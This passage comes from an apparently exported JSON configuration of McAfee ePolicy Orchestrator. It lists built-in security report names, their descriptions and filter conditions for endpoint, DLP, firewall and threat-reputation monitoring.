Usage\\\",\\r\\n\\t\\t\\t\\\"Unsigned Unknown Files by Company\\\",\\r\\n\\t\\t\\t\\\"Most Active Parents of Unknown Files\\\",\\r\\n\\t\\t\\t\\\"Most Monitored Unknown Files\\\",\\r\\n\\t\\t\\t\\\"Most Active Endpoints\\\",\\r\\n\\t\\t\\t\\\"Signed Unknown Files\\\",\\r\\n\\t\\t\\t\\\"Signed Unknown Files per Certificate Subject\\\",\\r\\n\\t\\t\\t\\\"Signed Unknown Files by Company\\\",\\r\\n\\t\\t\\t\\\"Signed Unknown Files by Product\\\",\\r\\n\\t\\t\\t\\\"DLP: Agent Status\\\",\\r\\n\\t\\t\\t\\\"DLP: Agent Operation mode\\\",\\r\\n\\t\\t\\t\\\"DLP: Operational events per type\\\",\\r\\n\\t\\t\\t\\\"DLP: Number of Incidents per day (data in-use/in-motion)\\\",\\r\\n\\t\\t\\t\\\"DLP: Number of Incidents per severity (data in-use/in-motion)\\\",\\r\\n\\t\\t\\t\\\"TIETest01\\\",\\r\\n\\t\\t\\t\\\"DLP Discovery (Endpoint): Local Email Scan Latest Errors\\\",\\r\\n\\t\\t\\t\\\"DLP Discovery (Endpoint): Local Email Scan Latest Classifications\\\",\\r\\n\\t\\t\\t\\\"DLP: Undefined Device Classes (for Windows Devices)\\\",\\r\\n\\t\\t\\t\\\"DLP: Policy revision 
distribution\\\",\\r\\n\\t\\t\\t\\\"DLP: Chrome unsupported versions \\\",\\r\\n\\t\\t\\t\\\"TIE Server Certificates with Changed GTI Reputation from Last Week\\\",\\r\\n\\t\\t\\t\\\"TIE Server Top 10 Systems with New Certificates from Last Week\\\",\\r\\n\\t\\t\\t\\\"TIE Server New Files by GTI Reputation from Last Week\\\",\\r\\n\\t\\t\\t\\\"TIE Server Malicious or Unidentified Files by GTI Reputation from Last Month\\\",\\r\\n\\t\\t\\t\\\"TIE Server Files by Enterprise Reputation\\\",\\r\\n\\t\\t\\t\\\"TIE Server Files with Changed GTI Reputation from Last Week\\\",\\r\\n\\t\\t\\t\\\"TIE Server Top 10 Systems with New Files from Last Week\\\",\\r\\n\\t\\t\\t\\\"TIE Server Cleanup Trending Summary\\\",\\r\\n\\t\\t\\t\\\"TIE Server Cleanup Criteria Effectiveness\\\",\\r\\n\\t\\t\\t\\\"TIE Server Used Malicious Files\\\",\\r\\n\\t\\t\\t\\\"TIE Server Most Recently Used Malicious Files\\\",\\r\\n\\t\\t\\t\\\"TIE Server Most Prevalent Malicious Files Created\\\",\\r\\n\\t\\t\\t\\\"Usage Metering Report\\\",\\r\\n\\t\\t\\t\\\"Data Protection Per Cloud VM\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Real Protect Detection Events in Last 24 Hours\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Real Protect Detection Events for Last 7 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Real Protect Detection Events for Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Real Protect Detection Events for Last Quarter\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Content Status\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Extra.DAT Signatures\\\"\\r\\n\\t\\t]\"",
    "description": "\"[\\r\\n\\t\\t\\t\\\"Shows all permissions for each user\\\",\\r\\n\\t\\t\\t\\\"Shows the permissions associated with each permission set\\\",\\r\\n\\t\\t\\t\\\"Shows the permission sets associated with each principal\\\",\\r\\n\\t\\t\\t\\\"Displays a table of all failed actions within the last 30 days from the Audit Log.\\\",\\r\\n\\t\\t\\t\\\"Displays a pie chart of detections within the last 24 hours organized by detecting product.\\\",\\r\\n\\t\\t\\t\\\"Displays a bar chart of your managed systems organized by top-level System Tree group.\\\",\\r\\n\\t\\t\\t\\\"Lists all system names that appear in multiple System Tree locations.\\\",\\r\\n\\t\\t\\t\\\"Displays a Boolean pie chart of managed systems in your environment which are compliant or noncompliant by version of McAfee Agent.\\\",\\r\\n\\t\\t\\t\\\"Displays the percentage of systems (over time) in your environment which are compliant. Uses the \\\\\\\"McAfee Agent Compliance Summary\\\\\\\" query to determine compliance. 
The \\\\\\\"Generate Records for McAfee Compliance History Reporting\\\\\\\" server task is used to record the daily compliance percentage.\\\",\\r\\n\\t\\t\\t\\\"Displays a Boolean pie chart of systems across all registered servers which are compliant or noncompliant by version of McAfee Agent.\\\",\\r\\n\\t\\t\\t\\\"Displays the percentage of systems (over time) across all registered server which are compliant.\\\",\\r\\n\\t\\t\\t\\\"Shows a multi-line chart with the total number of successful and unsuccessful replications per week for the last 2 months.\\\",\\r\\n\\t\\t\\t\\\"Displays a list grouped by user of all failed logon attempts in the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Displays a list grouped by user of all successful logon attempts in the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Displays a report grouped by user of all server configuration actions in the last 30 days as recorded in the Audit log.\\\",\\r\\n\\t\\t\\t\\\"Displays a report grouped by user of all software configuration actions in the last 30 days as recorded in the Audit Log.\\\",\\r\\n\\t\\t\\t\\\"Displays a report grouped by user of all actions considered configuration changes in the last 30 days as recorded in the Audit log.\\\",\\r\\n\\t\\t\\t\\\"Displays a line chart of the number of internal virus detections over the past quarter.\\\",\\r\\n\\t\\t\\t\\\"Displays a group summary table of all applied policies for McAfee agent grouped by category.\\\",\\r\\n\\t\\t\\t\\\"Displays a list of all applied policies and the number of times each policy has been applied.\\\",\\r\\n\\t\\t\\t\\\"Displays a report grouped by user of all policy assignments in the last 30 days as recorded in the Audit log.\\\",\\r\\n\\t\\t\\t\\\"Displays a pie chart of installed agents by version number on managed systems. Slice sizes indicate the relative number of agents of each version in the environment. 
Click any slice to view or take actions on those systems.\\\",\\r\\n\\t\\t\\t\\\"Displays a pie chart of managed systems indicating whether the agents have communicated with the ePO server within the past day. Click either slice to view or take actions on those systems.\\\",\\r\\n\\t\\t\\t\\\"Lists the systems with high sequence error counts. This could indicate a duplicate agent GUID problem.\\\",\\r\\n\\t\\t\\t\\\"Lists the systems with sequence errors older than 1 week. These systems probably do not have duplicate agent GUIDs and can have their error count reset.\\\",\\r\\n\\t\\t\\t\\\"List all unmanaged systems.\\\",\\r\\n\\t\\t\\t\\\"Lists all Software Manager failed installs.\\\",\\r\\n\\t\\t\\t\\\"Lists all points of broken inheritance for policy assignments other than My Organization. \\\",\\r\\n\\t\\t\\t\\\"List all applied client tasks grouped by product.\\\",\\r\\n\\t\\t\\t\\\"Lists all points in the tree where client task assignment inheritance has been broken, grouped by task name.\\\",\\r\\n\\t\\t\\t\\\"Displays a boolean pie chart of all product deployments in the last 24 hours. Successful deployments are shown in green.\\\",\\r\\n\\t\\t\\t\\\"Displays a single line chart grouped by day of all Agent uninstall client events in the last 7 days.\\\",\\r\\n\\t\\t\\t\\\"Displays a bar chart grouped by hour all the failed product deployments in the last 24 hours.\\\",\\r\\n\\t\\t\\t\\\"Displays a group bar chart grouped by hour of all failed product updates in the last 24 hours.\\\",\\r\\n\\t\\t\\t\\\"Displays a boolean pie chart off all product updates in the last 24 hours. 
Successful updates are shown in green.\\\",\\r\\n\\t\\t\\t\\\"Displays a Boolean pie chart of your distributed repositories, divided according to whether their last replication was successful.\\\",\\r\\n\\t\\t\\t\\\"Great query during a rollout or tracking the number of new agents showing up in ePO on daily, weekly or monthly basis.\\\",\\r\\n\\t\\t\\t\\\"Shows the most numerous threat events found.\\\",\\r\\n\\t\\t\\t\\\"This is a breakdown of threat events by where they reside in the system tree. The goal is to show an admin what groups are being hit with malware more than others are. This can help pinpoint where an organization needs to improve their security strategy.\\\",\\r\\n\\t\\t\\t\\\"Groups, totals, and charts the number of different threat events that occurred in the last 24 hours.\\\",\\r\\n\\t\\t\\t\\\"Shows multi-line chart of the total number of product updates successes and failures on a weekly basis for the last 2 months.\\\",\\r\\n\\t\\t\\t\\\"McAfee Agents that have not communicated with the ePolicy Orchestrator Server in the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Displays a pie chart of managed systems each slice representing an agent handler.\\\",\\r\\n\\t\\t\\t\\\"Agent handler communication status within the last hour.\\\",\\r\\n\\t\\t\\t\\\"This chart shows the trend of threat event generation for the last 2 weeks.\\\",\\r\\n\\t\\t\\t\\\"Displays a single group bar chart showing all managed nodes where policy enforcement is failing for at least one of the point products.\\\",\\r\\n\\t\\t\\t\\\"Displays a single group bar chart showing all managed nodes where property collection is failing for at least one of the point products.\\\",\\r\\n\\t\\t\\t\\\"Displays the amount of DAT and Engine pulling per repository. 
This query can help identify overloaded repositories that are causing bandwidth issues and necessary repository configuration improvements in policy.\\\",\\r\\n\\t\\t\\t\\\"Displays a pie chart indicating percentage utilization per repository. This query can help identify overloaded repositories that are causing bandwidth issues and necessary repository configuration improvements in policy.\\\",\\r\\n\\t\\t\\t\\\"This is the Web Control Compliance Status Report.\\\",\\r\\n\\t\\t\\t\\\"This report lists the Web Content Categories with the most infections in the last 7 days\\\",\\r\\n\\t\\t\\t\\\"Displays the hotfixes installed for Web Control.\\\",\\r\\n\\t\\t\\t\\\"Pie chart depicting number of visits over the last 30 days, grouped by site rating.\\\",\\r\\n\\t\\t\\t\\\"Pie chart depicting number of visits over the last 30 days, grouped by site content.\\\",\\r\\n\\t\\t\\t\\\"Pie chart depicting number of downloads over the last 30 days, grouped by file rating.\\\",\\r\\n\\t\\t\\t\\\"Top 100 red sites visited over the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Top 100 yellow sites visited over the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Top 100 unrated sites visited over the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Top 100 red sites that were blocked over the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Top 100 sites that were warned-continued over the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Top 100 sites that were blocked over the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Top 100 sites blocked because of Block List policy over the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Top 100 sites allowed because of Allow List policy over the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Detailed event log of site navigation activity over the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Bar chart depicting number of downloads over the last 30 days, grouped by policy-based action.\\\",\\r\\n\\t\\t\\t\\\"Detailed event log of download activity over the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Top 100 red sites allowed because of 
Allow List policy over the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Top sites grouped by content over the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Top 100 sites that were warned-cancelled over the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Bar chart depicting number of visits over the last 30 days, grouped by policy-based action.\\\",\\r\\n\\t\\t\\t\\\"Top 100 red downloads over the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Top 100 yellow downloads over the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Top 100 unrated downloads over the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Bar chart depicting number of visits to each content category over the last 30 days, grouped by policy-based action.\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Block Events for Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Allow Events for Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Clean Events for Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Block Events by Event Type\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Allow Events by Event Type\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Clean Events by Event Type\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Observation Block Events for Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Observation Allow Events for Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Observation Clean Events for Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Displays a table of all failed actions within the last 30 days from the Audit Log.\\\",\\r\\n\\t\\t\\t\\\"This report summarizes number of incidents (data in-use/in-motion) per type\\\",\\r\\n\\t\\t\\t\\\"This report summarizes number of incidents (data in-use/in-motion) per rule set\\\",\\r\\n\\t\\t\\t\\\"This is a stacked bar chart of multiple modules and their installation status\\\",\\r\\n\\t\\t\\t\\\"The number of threat events in the last twenty-four hours.\\\",\\r\\n\\t\\t\\t\\\"The number of threat events in the last seven 
days.\\\",\\r\\n\\t\\t\\t\\\"Summary of threats that have been detected in the last 24 hours.\\\",\\r\\n\\t\\t\\t\\\"Summary of threats that have been detected in the last seven days.\\\",\\r\\n\\t\\t\\t\\\"This report lists the Primary Vectors of Attack in the last 7 days.\\\",\\r\\n\\t\\t\\t\\\"This report lists the Top Infected Users in the Last 7 Days\\\",\\r\\n\\t\\t\\t\\\"This report lists the Top Threats in the Last 48 Hours\\\",\\r\\n\\t\\t\\t\\\"This report lists the Duration before Detection on Endpoints in the Last 2 Weeks\\\",\\r\\n\\t\\t\\t\\\"This report lists the top 10 attacking systems in the last 7 days\\\",\\r\\n\\t\\t\\t\\\"This report lists the technologies that are currently enabled on each system\\\",\\r\\n\\t\\t\\t\\\"This is the Self Protection Compliance Status Report.\\\",\\r\\n\\t\\t\\t\\\"Displays two lists of computers which do and do not have the latest policies applied.\\\",\\r\\n\\t\\t\\t\\\"Displays a boolean pie chart showing which policies have and have not been updated on the clients.\\\",\\r\\n\\t\\t\\t\\\"Displays the hotfixes installed for Endpoint Security Platform.\\\",\\r\\n\\t\\t\\t\\\"This report lists the Applications with the Most Exploits in the Last 7 Days\\\",\\r\\n\\t\\t\\t\\\"This report lists the Duration of Completed Full Scans in the last 7 days\\\",\\r\\n\\t\\t\\t\\\"This report lists the Duration of Completed Quick Scans in the last 7 days\\\",\\r\\n\\t\\t\\t\\\"This report lists the number of systems that have not completed a Full Scan in the last 7 days but within the last month\\\",\\r\\n\\t\\t\\t\\\"This report lists the number of systems that have not completed a Full Scan in the last month\\\",\\r\\n\\t\\t\\t\\\"This is the Access Protection Compliance Status Report.\\\",\\r\\n\\t\\t\\t\\\"This is the AMCore Content Compliance Status Report.\\\",\\r\\n\\t\\t\\t\\\"This is the Exploit Prevention Compliance Status Report.\\\",\\r\\n\\t\\t\\t\\\"This is the On-Access Scan Compliance Status 
Report.\\\",\\r\\n\\t\\t\\t\\\"This is the Content Status Report for Threat Prevention.\\\",\\r\\n\\t\\t\\t\\\"This is the Content Status Report for the Exploit Prevention feature.\\\",\\r\\n\\t\\t\\t\\\"Displays the number of threats on which an action was taken (cleaned, deleted) versus the number of threats on which no action was taken, in the last three months.\\\",\\r\\n\\t\\t\\t\\\"Displays the threats detected over the previous two quarters. No cookies.\\\",\\r\\n\\t\\t\\t\\\"Displays the top ten computers with the most detections in the last three months.\\\",\\r\\n\\t\\t\\t\\\"Displays the top ten detected threats in the last three months.\\\",\\r\\n\\t\\t\\t\\\"Displays the top ten most frequently broken access protection rules in the last three months.\\\",\\r\\n\\t\\t\\t\\\"Slice count is the number of events. Slices are the different event severities. All in the last three months.\\\",\\r\\n\\t\\t\\t\\\"Top 10 user with the most detections in the last three months.\\\",\\r\\n\\t\\t\\t\\\"Displays the top ten threats per threat category over the last three months. 
Grouped by threat category, then threat name.\\\",\\r\\n\\t\\t\\t\\\"Displays the top ten computers which are the source of a threat in the last three months.\\\",\\r\\n\\t\\t\\t\\\"Displays the top ten exploits prevented in the last three months.\\\",\\r\\n\\t\\t\\t\\\"Displays the hotfixes installed for Threat Prevention.\\\",\\r\\n\\t\\t\\t\\\"This reports displays the McAfee GTI sensitivity level for On-Access Scans.\\\",\\r\\n\\t\\t\\t\\\"This reports displays the McAfee GTI sensitivity level for On-Demand Full Scans.\\\",\\r\\n\\t\\t\\t\\\"This reports displays the McAfee GTI sensitivity level for On-Demand Quick Scans.\\\",\\r\\n\\t\\t\\t\\\"This reports displays the McAfee GTI sensitivity level for Right-Click Scans.\\\",\\r\\n\\t\\t\\t\\\"This report summarizes the Distribution of DLP products on endpoint computers\\\",\\r\\n\\t\\t\\t\\\"This report summarizes the current status of Local Email Storage endpoint scans\\\",\\r\\n\\t\\t\\t\\\"This report summarizes policy distribution\\\",\\r\\n\\t\\t\\t\\\"This report summarizes enforced Rule Sets per endpoint computer\\\",\\r\\n\\t\\t\\t\\\"This report lists Bypassed users\\\",\\r\\n\\t\\t\\t\\\"The number of intrusion events in the last twenty-four hours.\\\",\\r\\n\\t\\t\\t\\\"The number of firewall events in the last twenty-four hours.\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall: Displays events generated by system within McAfee GTI in the last 6 months.\\\",\\r\\n\\t\\t\\t\\\"The number of traffic block events in the last twenty-four hours.\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall Status\\\",\\r\\n\\t\\t\\t\\\"Displays where Firewall protection is enabled or disabled on managed systems.\\\",\\r\\n\\t\\t\\t\\\"Displays the number of Firewall client rules created over time.\\\",\\r\\n\\t\\t\\t\\\"Displays firewall client rules listed by process and port range.\\\",\\r\\n\\t\\t\\t\\\"Displays firewall client rules listed by process and user.\\\",\\r\\n\\t\\t\\t\\\"Displays firewall client 
rules listed by process.\\\",\\r\\n\\t\\t\\t\\\"Displays firewall client rules listed by protocol and system name.\\\",\\r\\n\\t\\t\\t\\\"Displays managed systems where the Firewall feature is enabled by policy but didn't start successfully.\\\",\\r\\n\\t\\t\\t\\\"Displays the hotfixes installed for Firewall.\\\",\\r\\n\\t\\t\\t\\\"Summarize how many cleanup executions deleted items.\\\",\\r\\n\\t\\t\\t\\\"Summary of the number of items deleted by week during cleanup executions.\\\",\\r\\n\\t\\t\\t\\\"Find suspicious most used files from last month.\\\",\\r\\n\\t\\t\\t\\\"Find most recently used suspicious files from last month.\\\",\\r\\n\\t\\t\\t\\\"Find most prevalent suspicious files created from last month.\\\",\\r\\n\\t\\t\\t\\\"Find monitored files most used from last month.\\\",\\r\\n\\t\\t\\t\\\"Find most recently used monitored files from last month.\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Observation Block Events by Event Type\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Observation Allow Events by Event Type\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Observation Clean Events by Event Type\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Block Events by Rule (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Observation Block Events by Rule (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Allow Events by Rule (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Observation Allow Events by Rule (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Clean Events by Rule (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Observation Clean Events by Rule (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Events by System (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Observation Events by System (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Events by File (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Observation Events by File (Top 
10)\\\",\\r\\n\\t\\t\\t\\\"False Positive Mitigation Events for the last 30 days\\\",\\r\\n\\t\\t\\t\\\"Find most prevalent monitored files created from last month.\\\",\\r\\n\\t\\t\\t\\\"Find used ATD submissions from last month.\\\",\\r\\n\\t\\t\\t\\\"Find TIE appliances split by DXL connectivity.\\\",\\r\\n\\t\\t\\t\\\"Find TIE appliances split by TIE server version.\\\",\\r\\n\\t\\t\\t\\\"Find TIE appliances split by agent version.\\\",\\r\\n\\t\\t\\t\\\"Find TIE appliances split by TIE platform version.\\\",\\r\\n\\t\\t\\t\\\"This report summarizes the current status of Local File System endpoint scans\\\",\\r\\n\\t\\t\\t\\\"This report summarizes the latest status of Local File System endpoint scans\\\",\\r\\n\\t\\t\\t\\\"This report summarizes the latest Local File System endpoint scans sensitive files\\\",\\r\\n\\t\\t\\t\\\"This report summarizes the latest Local File System endpoint scans errors\\\",\\r\\n\\t\\t\\t\\\"This report summarizes the latest Local File System endpoint scans classifications\\\",\\r\\n\\t\\t\\t\\\"This report summarizes the latest status of Local Email endpoint scans\\\",\\r\\n\\t\\t\\t\\\"This report summarizes the latest Local Email endpoint scans sensitive files\\\",\\r\\n\\t\\t\\t\\\"This report summarizes privileged users\\\",\\r\\n\\t\\t\\t\\\"This report summarizes Chrome support\\\",\\r\\n\\t\\t\\t\\\"Find all certificates created last week and aggregate by reputation.\\\",\\r\\n\\t\\t\\t\\\"Find all Malicious or Unidentified Certificates by GTI Reputation from Last Month.\\\",\\r\\n\\t\\t\\t\\\"Find all certificates and aggregate by enterprise reputation.\\\",\\r\\n\\t\\t\\t\\\"Find used CTD submissions from last month.\\\",\\r\\n\\t\\t\\t\\\"Lists the failed client interface logon attempts by user for all managed systems.\\\",\\r\\n\\t\\t\\t\\\"Lists locked client systems due to multiple failed password attempts.\\\",\\r\\n\\t\\t\\t\\\"This query displays computers which successfully installed the MCP Endpoint or failed 
installing the MCP Endpoint in the last month\\\",\\r\\n\\t\\t\\t\\\"Find TIE appliances split by DXL broker version.\\\",\\r\\n\\t\\t\\t\\\"Find used overridden files from last month.\\\",\\r\\n\\t\\t\\t\\\"The number of firewall events in the last twenty-four hours.\\\",\\r\\n\\t\\t\\t\\\"Security Incidents in last 14 days\\\",\\r\\n\\t\\t\\t\\\"OS Distribution for VMs discovered by McAfee Data Center\\\",\\r\\n\\t\\t\\t\\\"All registered Data Centers\\\",\\r\\n\\t\\t\\t\\\"Application Reputation\\\",\\r\\n\\t\\t\\t\\\"Anti-Malware Status\\\",\\r\\n\\t\\t\\t\\\"Host Firewall Status\\\",\\r\\n\\t\\t\\t\\\"File Integrity Monitoring Status\\\",\\r\\n\\t\\t\\t\\\"Boot Attestation Status of all ESX Hypervisors in the Data Center\\\",\\r\\n\\t\\t\\t\\\"AV protection by product\\\",\\r\\n\\t\\t\\t\\\"Specifies the protection status of the endpoints.\\\",\\r\\n\\t\\t\\t\\\"Specifies the last scan details of the endpoints.\\\",\\r\\n\\t\\t\\t\\\"Security Incidents in last 14 days\\\",\\r\\n\\t\\t\\t\\\"OS Distribution for VMs discovered by McAfee Data Center\\\",\\r\\n\\t\\t\\t\\\"All registered Data Centers\\\",\\r\\n\\t\\t\\t\\\"Anti-Malware Status\\\",\\r\\n\\t\\t\\t\\\"File Integrity Monitoring Status\\\",\\r\\n\\t\\t\\t\\\"Instance assessment based on Agentless Firewall\\\",\\r\\n\\t\\t\\t\\\"Host Firewall Status\\\",\\r\\n\\t\\t\\t\\\"Specifies the protection status of vSphere endpoints\\\",\\r\\n\\t\\t\\t\\\"Find refreshed files from last month.\\\",\\r\\n\\t\\t\\t\\\"Shows database size from last month.\\\",\\r\\n\\t\\t\\t\\\"Find new files from last month.\\\",\\r\\n\\t\\t\\t\\\"Find new overrides from last month.\\\",\\r\\n\\t\\t\\t\\\"Find ATD submissions split by reputation.\\\",\\r\\n\\t\\t\\t\\\"Find ATD sample submissions during last month.\\\",\\r\\n\\t\\t\\t\\\"Find most prevalent ATD submissions.\\\",\\r\\n\\t\\t\\t\\\"Find new ATD submissions from last month.\\\",\\r\\n\\t\\t\\t\\\"Find CTD submissions split by reputation.\\\",\\r\\n\\t\\t\\t\\\"Find 
CTD sample submissions from last month.\\\",\\r\\n\\t\\t\\t\\\"Find most prevalent CTD submissions.\\\",\\r\\n\\t\\t\\t\\\"Find new CTD submissions from last month.\\\",\\r\\n\\t\\t\\t\\\"Find trusted file overrides having similar GTI reputation.\\\",\\r\\n\\t\\t\\t\\\"Find suspicious file overrides having similar GTI reputation.\\\",\\r\\n\\t\\t\\t\\\"Find suspicious file overrides with conflicting GTI reputation.\\\",\\r\\n\\t\\t\\t\\\"This report summarizes number of operational events per day\\\",\\r\\n\\t\\t\\t\\\"This report summarizes the DLP client version installed on endpoint computers\\\",\\r\\n\\t\\t\\t\\\"Find trusted file overrides with conflicting GTI reputation.\\\",\\r\\n\\t\\t\\t\\\"Find unknown files that are not signed from last month.\\\",\\r\\n\\t\\t\\t\\\"Find unsigned unknown files per composite reputation and group them by their first and last access.\\\",\\r\\n\\t\\t\\t\\\"Find Unsigned Unknown Files by company from last month.\\\",\\r\\n\\t\\t\\t\\\"Find the most active parent Files of Unknown Files from last month.\\\",\\r\\n\\t\\t\\t\\\"Find the 10 most monitored Unknown Files from last month.\\\",\\r\\n\\t\\t\\t\\\"Find the 10 systems that reported the largest number of New Files from last month.\\\",\\r\\n\\t\\t\\t\\\"Find signed unknown files from last month.\\\",\\r\\n\\t\\t\\t\\\"Find files split by certificate subject and SHA-1.\\\",\\r\\n\\t\\t\\t\\\"Find signed Unknown Files by company from last month.\\\",\\r\\n\\t\\t\\t\\\"Find signed Unknown Files by product from last month.\\\",\\r\\n\\t\\t\\t\\\"This report summarizes the DLP client status on endpoint computers\\\",\\r\\n\\t\\t\\t\\\"This report summarizes the DLP client operational mode on endpoint computers\\\",\\r\\n\\t\\t\\t\\\"This report summarizes the number of DLP operational events per type\\\",\\r\\n\\t\\t\\t\\\"This report summarizes number of incidents (data in-use/in-motion) per day\\\",\\r\\n\\t\\t\\t\\\"This report summarizes number of incidents (data 
in-use/in-motion) per severity\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"This report summarizes the latest Local Email endpoint scans errors\\\",\\r\\n\\t\\t\\t\\\"This report summarizes the latest Local Email endpoint scans classifications\\\",\\r\\n\\t\\t\\t\\\"This report summarizes undefined device classes for windows devices only\\\",\\r\\n\\t\\t\\t\\\"This report summarizes policy revision distribution\\\",\\r\\n\\t\\t\\t\\\"This report displays unsupported Chrome versions\\\",\\r\\n\\t\\t\\t\\\"Find all certificates where the GTI reputation changed last week.\\\",\\r\\n\\t\\t\\t\\\"Find top 10 systems with new certificates last week.\\\",\\r\\n\\t\\t\\t\\\"Find all files created last week and aggregate by reputation.\\\",\\r\\n\\t\\t\\t\\\"Find all Malicious or Unidentified Files by GTI Reputation from Last Month.\\\",\\r\\n\\t\\t\\t\\\"Find all files and aggregate by enterprise reputation.\\\",\\r\\n\\t\\t\\t\\\"Find all files where the GTI reputation changed last week.\\\",\\r\\n\\t\\t\\t\\\"Find top 10 systems with new files last week.\\\",\\r\\n\\t\\t\\t\\\"Show cleanup trending summary.\\\",\\r\\n\\t\\t\\t\\\"Display the number of executions that delete items versus those that don't delete items.\\\",\\r\\n\\t\\t\\t\\\"Find malicious files by composite reputation from last month.\\\",\\r\\n\\t\\t\\t\\\"Find most recent malicious files from last month.\\\",\\r\\n\\t\\t\\t\\\"Find most prevalent malicious files created from last month.\\\",\\r\\n\\t\\t\\t\\\"Provides McAfee product usage report.\\\",\\r\\n\\t\\t\\t\\\"The number data protected v/s unprotected volumes attached to per VM.\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Observation Real Protect Detection Events in Last 24 Hours\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Observation Real Protect Detection Events for Last 7 Days\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Observation Real Protect Detection Events for Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat 
Protection Observation Real Protect Detection Events for Last Quarter\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Content Status\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Extra.DAT Signature Names\\\"\\r\\n\\t\\t]\"",
    "conditionSexp": "\"[\\r\\n\\t\\t\\t\\\"Permission Does not equal \\\\\\\"%%NOEPOROLES%%\\\\\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"(Success Equals False and Start Time Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 1 Days and Event Category Does not belong to Operational)\\\",\\r\\n\\t\\t\\t\\\"Managed State Equals Managed\\\",\\r\\n\\t\\t\\t\\\"System Name Is duplicated \\\",\\r\\n\\t\\t\\t\\\"Last Communication Is within the last 1 Days\\\",\\r\\n\\t\\t\\t\\\"(Query Used to Generate Compliance Event Equals \\\\\\\"McAfee Agent Compliance Summary\\\\\\\" and Compliance Check Time Is within the last 1 Years)\\\",\\r\\n\\t\\t\\t\\\"Last Communication Is within the last 2 Weeks\\\",\\r\\n\\t\\t\\t\\\"(Query Used to Generate Compliance Event Equals \\\\\\\"McAfee Agent Compliance Summary\\\\\\\" and Compliance Check Time Is within the last 1 Years)\\\",\\r\\n\\t\\t\\t\\\"(Action Equals \\\\\\\"Repository Replication\\\\\\\" and Completion Time Is within the last 2 Months)\\\",\\r\\n\\t\\t\\t\\\"(Action Equals \\\\\\\"Logon attempt\\\\\\\" and Success Equals False and Start Time Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Completion Time Is within the last 1 Months and Action Equals \\\\\\\"Logon attempt\\\\\\\" and Success Equals True)\\\",\\r\\n\\t\\t\\t\\\"((Action Equals \\\\\\\"Add Agent Handler Assignment Rule\\\\\\\" or Action Equals \\\\\\\"Add License Key\\\\\\\" or Action Equals \\\\\\\"Backup Keystore\\\\\\\" or Action Equals \\\\\\\"Change Password\\\\\\\" or Action Equals \\\\\\\"Change Registered Server\\\\\\\" or Action Equals \\\\\\\"Create Key\\\\\\\" or Action Equals \\\\\\\"Delete Agent Handler Assignment Rule\\\\\\\" or Action Equals \\\\\\\"Delete Key\\\\\\\" or Action Equals \\\\\\\"Delete Server\\\\\\\" or Action Equals 